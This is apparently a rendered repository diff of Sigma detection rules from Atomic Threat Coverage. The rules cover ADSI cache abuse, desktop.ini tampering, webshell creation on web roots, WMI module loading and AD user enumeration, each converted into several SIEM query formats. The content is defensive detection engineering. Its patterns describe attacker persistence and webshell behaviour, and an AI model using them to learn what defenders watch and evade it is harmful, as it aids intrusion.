curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/75bf09fa-1dd7-4d18-9af9-dd9e492562eb <<EOF\n{\n "metadata": {\n "title": "Suspicious ADSI-Cache Usage By Unknown Tool",\n "description": "detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.",\n "tags": [\n "attack.t1041",\n "attack.persistence"\n ],\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\Local\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SchCache\\\\*.sch) AND (NOT (Image.keyword:(*C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\svchost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\dllhost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\mmc.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\Local\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SchCache\\\\*.sch) AND (NOT (Image.keyword:(*C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\svchost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\dllhost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\mmc.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious ADSI-Cache Usage By Unknown Tool\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"11" AND TargetFilename.keyword:*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch) AND (NOT (Image.keyword:(*C\\:\\\\windows\\\\system32\\\\svchost.exe* *C\\:\\\\windows\\\\system32\\\\dllhost.exe* *C\\:\\\\windows\\\\system32\\\\mmc.exe* *C\\:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*))))
```
### splunk
```
((EventID="11" TargetFilename="*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch") NOT ((Image="*C:\\\\windows\\\\system32\\\\svchost.exe*" OR Image="*C:\\\\windows\\\\system32\\\\dllhost.exe*" OR Image="*C:\\\\windows\\\\system32\\\\mmc.exe*" OR Image="*C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*")))
```
### logpoint
```
((event_id="11" TargetFilename="*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch") -(Image IN ["*C:\\\\windows\\\\system32\\\\svchost.exe*", "*C:\\\\windows\\\\system32\\\\dllhost.exe*", "*C:\\\\windows\\\\system32\\\\mmc.exe*", "*C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*11)(?=.*.*\\Local\\Microsoft\\Windows\\SchCache\\.*\\.sch)))(?=.*(?!.*(?:.*(?=.*(?:.*.*C:\\windows\\system32\\svchost\\.exe.*|.*.*C:\\windows\\system32\\dllhost\\.exe.*|.*.*C:\\windows\\system32\\mmc\\.exe.*|.*.*C:\\windows\\system32\\WindowsPowerShell\\v1\\.0\\powershell\\.exe.*))))))'
```

96
Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_desktop_ini.md Normal file
View File

@ -0,0 +1,96 @@
| Title | Suspicious desktop.ini Action |
|:-------------------------|:------------------|
| **Description** | Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1023: Shortcut Modification](https://attack.mitre.org/techniques/T1023)</li></ul> |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
| **Trigger** | <ul><li>[T1023: Shortcut Modification](../Triggers/T1023.md)</li></ul> |
| **Severity Level** | medium |
| **False Positives** | <ul><li>Operations performed through Windows SCCM or equivalent</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/](https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/)</li></ul> |
| **Author** | Maxime Thiebaut (@0xThiebaut) |
## Detection Rules
### Sigma rule
```
title: Suspicious desktop.ini Action
id: 81315b50-6b60-4d8f-9928-3466e1022515
status: experimental
description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
references:
- https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
author: Maxime Thiebaut (@0xThiebaut)
date: 2020/03/19
tags:
- attack.persistence
- attack.t1023
logsource:
product: windows
service: sysmon
detection:
filter:
Image:
- 'C:\Windows\explorer.exe'
- 'C:\Windows\System32\msiexec.exe'
- 'C:\Windows\System32\mmc.exe'
selection:
EventID: 11
TargetFilename|endswith: '\desktop.ini'
condition: selection and not filter
falsepositives:
- Operations performed through Windows SCCM or equivalent
level: medium
```
### es-qs
```
((EventID:"11" AND TargetFilename.keyword:*\\\\desktop.ini) AND (NOT (Image:("C\\:\\\\Windows\\\\explorer.exe" OR "C\\:\\\\Windows\\\\System32\\\\msiexec.exe" OR "C\\:\\\\Windows\\\\System32\\\\mmc.exe"))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/81315b50-6b60-4d8f-9928-3466e1022515 <<EOF\n{\n "metadata": {\n "title": "Suspicious desktop.ini Action",\n "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder\'s content (i.e. renaming files) without changing them on disk.",\n "tags": [\n "attack.persistence",\n "attack.t1023"\n ],\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\desktop.ini) AND (NOT (Image:(\\"C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe\\"))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\desktop.ini) AND (NOT (Image:(\\"C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe\\"))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious desktop.ini Action\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"11" AND TargetFilename.keyword:*\\\\desktop.ini) AND (NOT (Image:("C\\:\\\\Windows\\\\explorer.exe" "C\\:\\\\Windows\\\\System32\\\\msiexec.exe" "C\\:\\\\Windows\\\\System32\\\\mmc.exe"))))
```
### splunk
```
((EventID="11" TargetFilename="*\\\\desktop.ini") NOT ((Image="C:\\\\Windows\\\\explorer.exe" OR Image="C:\\\\Windows\\\\System32\\\\msiexec.exe" OR Image="C:\\\\Windows\\\\System32\\\\mmc.exe")))
```
### logpoint
```
((event_id="11" TargetFilename="*\\\\desktop.ini") -(Image IN ["C:\\\\Windows\\\\explorer.exe", "C:\\\\Windows\\\\System32\\\\msiexec.exe", "C:\\\\Windows\\\\System32\\\\mmc.exe"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*11)(?=.*.*\\desktop\\.ini)))(?=.*(?!.*(?:.*(?=.*(?:.*C:\\Windows\\explorer\\.exe|.*C:\\Windows\\System32\\msiexec\\.exe|.*C:\\Windows\\System32\\mmc\\.exe))))))'
```

2
Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_run_key_img_folder.md
View File

@ -27,7 +27,7 @@ author: Florian Roth, Markus Neis
tags:
- attack.persistence
- attack.t1060
date: 2018/25/08
date: 2018/08/25
modified: 2020/02/26
logsource:
product: windows

2
Atomic_Threat_Coverage/Detection_Rules/sysmon_suspicious_remote_thread.md
View File

@ -25,7 +25,7 @@ description: Offensive tradecraft is switching away from using APIs like "Create
notes:
- MonitoringHost.exe is a process that loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
status: experimental
date: 27/10/2019
date: 2019/10/27
modified: 2019/11/13
author: Perez Diego (@darkquassar), oscd.community
references:

6
Atomic_Threat_Coverage/Detection_Rules/sysmon_webshell_creation_detect.md
View File

@ -1,6 +1,6 @@
| Title | Windows Webshell Creation |
|:-------------------------|:------------------|
| **Description** | Posible webshell file creation on a static web site |
| **Description** | Possible webshell file creation on a static web site |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul> |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
@ -20,7 +20,7 @@
title: Windows Webshell Creation
id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
status: experimental
description: Posible webshell file creation on a static web site
description: Possible webshell file creation on a static web site
references:
- PT ESC rule and personal experience
author: Beyu Denis, oscd.community
@ -77,7 +77,7 @@ falsepositives:
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/39f1f9f2-9636-45de-98f6-a4046aa8e4b9 <<EOF\n{\n "metadata": {\n "title": "Windows Webshell Creation",\n "description": "Posible webshell file creation on a static web site",\n "tags": [\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Windows Webshell Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/39f1f9f2-9636-45de-98f6-a4046aa8e4b9 <<EOF\n{\n "metadata": {\n "title": "Windows Webshell Creation",\n "description": "Possible webshell file creation on a static web site",\n "tags": [\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Windows Webshell Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

13
Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_module_load.md
View File

@ -48,6 +48,7 @@ detection:
filter:
Image|endswith:
- '\WmiPrvSe.exe'
- '\WmiPrvSE.exe'
- '\WmiAPsrv.exe'
- '\svchost.exe'
condition: selection and not filter
@ -69,42 +70,42 @@ level: high
### es-qs
```
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll OR *\\\\WmiApRpl.dll OR *\\\\wmiprov.dll OR *\\\\wmiutils.dll OR *\\\\wbemcomn.dll OR *\\\\wbemprox.dll OR *\\\\WMINet_Utils.dll OR *\\\\wbemsvc.dll OR *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe OR *\\\\WmiAPsrv.exe OR *\\\\svchost.exe))))
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll OR *\\\\WmiApRpl.dll OR *\\\\wmiprov.dll OR *\\\\wmiutils.dll OR *\\\\wbemcomn.dll OR *\\\\wbemprox.dll OR *\\\\WMINet_Utils.dll OR *\\\\wbemsvc.dll OR *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe OR *\\\\WmiPrvSE.exe OR *\\\\WmiAPsrv.exe OR *\\\\svchost.exe))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/671bb7e3-a020-4824-a00e-2ee5b55f385e <<EOF\n{\n "metadata": {\n "title": "WMI Modules Loaded",\n "description": "Detects non wmiprvse loading WMI modules",\n "tags": [\n "attack.execution",\n "attack.t1047"\n ],\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'WMI Modules Loaded\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}\\n ImageLoaded = {{_source.ImageLoaded}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/671bb7e3-a020-4824-a00e-2ee5b55f385e <<EOF\n{\n "metadata": {\n "title": "WMI Modules Loaded",\n "description": "Detects non wmiprvse loading WMI modules",\n "tags": [\n "attack.execution",\n "attack.t1047"\n ],\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiPrvSE.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiPrvSE.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'WMI Modules Loaded\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}\\n ImageLoaded = {{_source.ImageLoaded}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll *\\\\WmiApRpl.dll *\\\\wmiprov.dll *\\\\wmiutils.dll *\\\\wbemcomn.dll *\\\\wbemprox.dll *\\\\WMINet_Utils.dll *\\\\wbemsvc.dll *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe *\\\\WmiAPsrv.exe *\\\\svchost.exe))))
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll *\\\\WmiApRpl.dll *\\\\wmiprov.dll *\\\\wmiutils.dll *\\\\wbemcomn.dll *\\\\wbemprox.dll *\\\\WMINet_Utils.dll *\\\\wbemsvc.dll *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe *\\\\WmiPrvSE.exe *\\\\WmiAPsrv.exe *\\\\svchost.exe))))
```
### splunk
```
((EventID="7" (ImageLoaded="*\\\\wmiclnt.dll" OR ImageLoaded="*\\\\WmiApRpl.dll" OR ImageLoaded="*\\\\wmiprov.dll" OR ImageLoaded="*\\\\wmiutils.dll" OR ImageLoaded="*\\\\wbemcomn.dll" OR ImageLoaded="*\\\\wbemprox.dll" OR ImageLoaded="*\\\\WMINet_Utils.dll" OR ImageLoaded="*\\\\wbemsvc.dll" OR ImageLoaded="*\\\\fastprox.dll")) NOT ((Image="*\\\\WmiPrvSe.exe" OR Image="*\\\\WmiAPsrv.exe" OR Image="*\\\\svchost.exe"))) | table ComputerName,User,Image,ImageLoaded
((EventID="7" (ImageLoaded="*\\\\wmiclnt.dll" OR ImageLoaded="*\\\\WmiApRpl.dll" OR ImageLoaded="*\\\\wmiprov.dll" OR ImageLoaded="*\\\\wmiutils.dll" OR ImageLoaded="*\\\\wbemcomn.dll" OR ImageLoaded="*\\\\wbemprox.dll" OR ImageLoaded="*\\\\WMINet_Utils.dll" OR ImageLoaded="*\\\\wbemsvc.dll" OR ImageLoaded="*\\\\fastprox.dll")) NOT ((Image="*\\\\WmiPrvSe.exe" OR Image="*\\\\WmiPrvSE.exe" OR Image="*\\\\WmiAPsrv.exe" OR Image="*\\\\svchost.exe"))) | table ComputerName,User,Image,ImageLoaded
```
### logpoint
```
((event_id="7" ImageLoaded IN ["*\\\\wmiclnt.dll", "*\\\\WmiApRpl.dll", "*\\\\wmiprov.dll", "*\\\\wmiutils.dll", "*\\\\wbemcomn.dll", "*\\\\wbemprox.dll", "*\\\\WMINet_Utils.dll", "*\\\\wbemsvc.dll", "*\\\\fastprox.dll"]) -(Image IN ["*\\\\WmiPrvSe.exe", "*\\\\WmiAPsrv.exe", "*\\\\svchost.exe"]))
((event_id="7" ImageLoaded IN ["*\\\\wmiclnt.dll", "*\\\\WmiApRpl.dll", "*\\\\wmiprov.dll", "*\\\\wmiutils.dll", "*\\\\wbemcomn.dll", "*\\\\wbemprox.dll", "*\\\\WMINet_Utils.dll", "*\\\\wbemsvc.dll", "*\\\\fastprox.dll"]) -(Image IN ["*\\\\WmiPrvSe.exe", "*\\\\WmiPrvSE.exe", "*\\\\WmiAPsrv.exe", "*\\\\svchost.exe"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*7)(?=.*(?:.*.*\\wmiclnt\\.dll|.*.*\\WmiApRpl\\.dll|.*.*\\wmiprov\\.dll|.*.*\\wmiutils\\.dll|.*.*\\wbemcomn\\.dll|.*.*\\wbemprox\\.dll|.*.*\\WMINet_Utils\\.dll|.*.*\\wbemsvc\\.dll|.*.*\\fastprox\\.dll))))(?=.*(?!.*(?:.*(?=.*(?:.*.*\\WmiPrvSe\\.exe|.*.*\\WmiAPsrv\\.exe|.*.*\\svchost\\.exe))))))'
grep -P '^(?:.*(?=.*(?:.*(?=.*7)(?=.*(?:.*.*\\wmiclnt\\.dll|.*.*\\WmiApRpl\\.dll|.*.*\\wmiprov\\.dll|.*.*\\wmiutils\\.dll|.*.*\\wbemcomn\\.dll|.*.*\\wbemprox\\.dll|.*.*\\WMINet_Utils\\.dll|.*.*\\wbemsvc\\.dll|.*.*\\fastprox\\.dll))))(?=.*(?!.*(?:.*(?=.*(?:.*.*\\WmiPrvSe\\.exe|.*.*\\WmiPrvSE\\.exe|.*.*\\WmiAPsrv\\.exe|.*.*\\svchost\\.exe))))))'
```

98
Atomic_Threat_Coverage/Detection_Rules/win_ad_user_enumeration.md Normal file
View File

@ -0,0 +1,98 @@
| Title | AD User Enumeration |
|:-------------------------|:------------------|
| **Description** | Detects access to a domain user from a non-machine account |
| **ATT&amp;CK Tactic** | <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul> |
| **Data Needed** | <ul><li>[DN_0030_4662_operation_was_performed_on_an_object](../Data_Needed/DN_0030_4662_operation_was_performed_on_an_object.md)</li></ul> |
| **Trigger** | <ul><li>[T1087: Account Discovery](../Triggers/T1087.md)</li></ul> |
| **Severity Level** | medium |
| **False Positives** | <ul><li>Administrators configuring new users.</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)</li><li>[http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html](http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html)</li><li>[https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all](https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all)</li></ul> |
| **Author** | Maxime Thiebaut (@0xThiebaut) |
## Detection Rules
### Sigma rule
```
title: AD User Enumeration
id: ab6bffca-beff-4baa-af11-6733f296d57a
description: Detects access to a domain user from a non-machine account
status: experimental
date: 2020/03/30
author: Maxime Thiebaut (@0xThiebaut)
references:
- https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
- http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html
- https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties
tags:
- attack.discovery
- attack.t1087
logsource:
product: windows
service: security
definition: Requires the "Read all properties" permission on the user object to be audited for the "Everyone" principal
detection:
selection:
EventID: 4662
ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}"
- 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user)
filter:
- SubjectUserName|endswith: '$' # Exclude machine accounts
- SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account
condition: selection and not filter
falsepositives:
- Administrators configuring new users.
level: medium
```
### es-qs
```
((EventID:"4662" AND ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
```
### xpack-watcher
```
